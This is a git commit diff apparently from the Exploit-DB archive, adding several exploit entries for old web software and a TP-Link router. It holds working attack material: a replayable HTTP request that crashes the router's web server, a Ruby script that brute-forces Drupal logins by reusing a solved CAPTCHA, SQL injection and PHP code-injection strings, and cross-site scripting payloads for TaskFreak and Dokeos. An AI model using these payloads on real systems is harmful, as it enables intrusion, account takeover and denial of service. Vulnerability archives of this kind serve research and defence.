Updated 11_25_2014

This commit is contained in:
Offensive Security 2014-11-25 04:49:14 +00:00
parent 430fa48249
commit 904c13f502
9 changed files with 283 additions and 0 deletions

View file

@ -31824,3 +31824,11 @@ id,file,description,date,author,platform,type,port
35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 EmployeeSearch.cc Multiple Parameter XSS",2011-02-10,"Core Security",php,webapps,0
35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0
35333,platforms/php/webapps/35333.py,"webERP 4.0.1 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability",2011-02-10,"AutoSec Tools",php,webapps,0
35334,platforms/php/webapps/35334.txt,"RunCMS 2.2.2 'register.php' SQL Injection Vulnerability",2011-02-10,"High-Tech Bridge SA",php,webapps,0
35335,platforms/php/webapps/35335.html,"Drupal CAPTCHA Module Security Bypass Vulnerability",2011-02-11,anonymous,php,webapps,0
35336,platforms/php/webapps/35336.txt,"TaskFreak 0.6.4 index.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 print_list.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0
35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0
35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 'style' Parameter Cross Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,57 @@
TP-Link TL-WR740N Wireless Router MitM httpd Denial Of Service
Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us
Affected version:
- Firmware version: 3.17.0 Build 140520 Rel.75075n (Released: 5/20/2014)
- Firmware version: 3.16.6 Build 130529 Rel.47286n (Released: 5/29/2013)
- Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
- Hardware version: WR740N v4 00000000 (v4.23)
- Model No. TL-WR740N / TL-WR740ND
Summary: The TL-WR740N is a combined wired/wireless network connection
device integrated with internet-sharing router and 4-port switch. The
wireless N Router is 802.11b&g compatible based on 802.11n technology
and gives you 802.11n performance up to 150Mbps at an even more affordable
price. Bordering on 11n and surpassing 11g speed enables high bandwidth
consuming applications like video streaming to be more fluid.
Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
denial of service vulnerability when processing a HTTP GET request. This
issue occurs when the web server (httpd) fails to handle a HTTP GET request
over a given default TCP port 80. Resending the value 'new' to the 'isNew'
parameter in 'PingIframeRpm.htm' script to the router thru a proxy will
crash its httpd service denying the legitimate users access to the admin
control panel management interface. To bring back the http srv and the
admin UI, a user must physically reboot the router.
Tested on: Router Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5210
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5210.php
13.11.2014
---
Replay
GET /userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&lineNum=1 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46342/info
RunCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
RunCMS 2.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/register.php?uname=user3&email=user%40test2.com&user_viewemail=0&name=user3&address=nope&zip_code=123&town=nope&user_from=nope&phone=123&user_avatar=blank.gif&timezone_offset=123'SQL_CODE_HERE&url=http%3A%2F%2Fnope&language=english&passw=password&vpassw=password&user_mailok=1&verify_text=&verify_crc=&keystring=368483&op=finish

128
platforms/php/webapps/35335.html Executable file
View file

@ -0,0 +1,128 @@
source: http://www.securityfocus.com/bid/46344/info
The CAPTCHA module for Drupal is prone to a security-bypass vulnerability that occurs in the CAPTCHA authentication routine.
Successful exploits may allow attackers to bypass the CAPTCHA-based authentication routine, allowing attackers to perform brute-force attacks.
# Drupal Captcha bruteforcing bypass
# This is a Proof Of Concept to demonstrate a logic security flow
# in the way drupal captcha is used to protect login forms
# from bruteforce. If the captcha challenge is solved, the next
# login attempts can be issued without solving any new captcha challenge.
# Usage: change URL, PATH, USERAGENT as you need.
# Change cookie, captcha_sid, captcha_token, form_build_id with the values
# you got in the html response AFTER the captcha is solved. This is needed
# in order to issue the first request as valid.
# Unique tokens will be then updated automatically .
# author: Michele "antisnatchor" Orru'
require "net/http"
require "net/https"
require "erb"
require "singleton"
require "rubygems"
require "nokogiri"
URL = 'antisnatchor.com'
PATH = '/user'
USERAGENT = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13'
# easy to enhance this reading list from a file, but this is just a PoC
USERNAME_LIST = ['admin']
PASSWD_LIST = ['test1', 'test2', 'test3', 'guessme']
# these are the session values needed to create valid http requests, after
# the reCaptcha has been solved the first time, leaving the login form
# without a new captcha challenge
cookie = "SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; has_js=1;"
captcha_sid = "476"
form_id = "user_login"
# these anti-XSRF tokens will change for every http response,
# so nokogiri is used to parse the html response in order to create
# the next http request with the valid anti-xsrf/captcha tokens.
# These initial values will be changed accordingly and automatically
# for each request .
captcha_token = "d853d6df05f6c6a956a46f20c8fe20aa"
form_build_id = "form-43fb0bcbcb140066a782a3fc23ab1ab7"
authenticated = false;
@http = Net::HTTP.new(URL, 80)
@http.use_ssl = false
puts "+Initial xsrf token [" + form_build_id + "]"
puts "+Initial captcha token [" + captcha_token + "]"
puts "+Dictionary attack with [" + PASSWD_LIST.size.to_s + "] passwords"
# I'm learning ruby :-)
passwd_counter = 0
while !authenticated && passwd_counter < PASSWD_LIST.size do
puts "+Testing password [" + PASSWD_LIST[passwd_counter] + "]"
post_data = "name=" + USERNAME_LIST[0] + "&pass=" + PASSWD_LIST[passwd_counter] + "&form_build_id=" + form_build_id +
"&form_id=" + form_id + "&captcha_sid="+ captcha_sid +
"&captcha_token=" + captcha_token + "&op=Log+in"
@headers = {
'Cookie' => cookie,
'Referer' => 'http://' + URL + PATH,
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => USERAGENT
}
puts "+Request headers = " + @headers.inspect
resp, data = @http.post2(PATH, post_data, @headers)
# loads the response in nokogiri to parse anti-XSRF tokens
doc = Nokogiri::HTML(data)
puts '+Code = ' + resp.code
puts '+Message = ' + resp.message
# "debug" code
#puts "=================================================== raw response START ======================================================="
#puts data
#puts "=================================================== raw response END ======================================================="
if data.index("CAPTCHA session reuse attack detected") != nil
puts "Doh', we've been detected by Drupal...quitting now"
break
end
if data.index("Sorry, unrecognized username or password") == nil && resp.code == "302"
# if credentials will be valid, there will be a 302 response with
# a new location header, corresponding to the user home page (http://antisnatchor.com/user/1 for instance)
authenticated = true
else
#parse the anti-xsrf and captcha tokens from the response
doc.css('input[id^=form]').each do |form_build_id|
form_build_id = form_build_id['id']
puts "+New xsrf token [" + form_build_id + "]"
end
doc.css('input[id^=edit-captcha-token]').each do |captcha_token_id|
captcha_token = captcha_token_id['value']
puts "+New captcha token [" + captcha_token + "]"
end
# I'm still learning ruby :-)
passwd_counter = passwd_counter + 1;
end
break if authenticated == true
end
if authenticated
puts "+Succesfully authenticated user[" + USERNAME_LIST[0] + "] with password [" + PASSWD_LIST[passwd_counter] + "]"
else
puts "+No passwords are valid for user [" + USERNAME_LIST[0] + "]. Dictionary attack failed."
end

31
platforms/php/webapps/35336.txt Executable file
View file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/46350/info
TaskFreak! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
<script type="text/javascript">function xss(){document.forms["zappa"].submit();}</script>
<form name="zappa" action="http://taskfreak/index.php" method="POST" id="zappa">
<input type="hidden" name="sProject" value="0" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="mode" value="save" />
<input type="hidden" name="sContext" value='%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20' />
<input type="hidden" name="sort" value='"><script>alert(1)</script>' />
<input type="hidden" name="dir" value='"><script>alert(2)</script>' />
<input type="hidden" name="show" value='"><script>alert(3)</script>' />
</form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit!<h3></center></font></b></a>

11
platforms/php/webapps/35337.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/46350/info
TaskFreak! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
http://taskfreak/print_list.php?dir=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://taskfreak/print_list.php?show=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

21
platforms/php/webapps/35338.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/46350/info
TaskFreak! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
GET /taskfreak/rss.php HTTP/1.1
Referer: ">Waddup!
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46366/info
Smarty Template Engine is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Versions prior to Smarty Template Engine 3.0.7 are vulnerable.
$smarty.template : '.(include 'hack.php').'.tpl

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46370/info
Dokeos is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Dokeos 1.8.6.2 is vulnerable; other versions may also be affected.
http://www.example.com/dokeos/main/inc/latex.php?code=%22style=%22top:0;position:absolute;width:9999px;height:9999px;%22onmouseover%3d%22alert(0)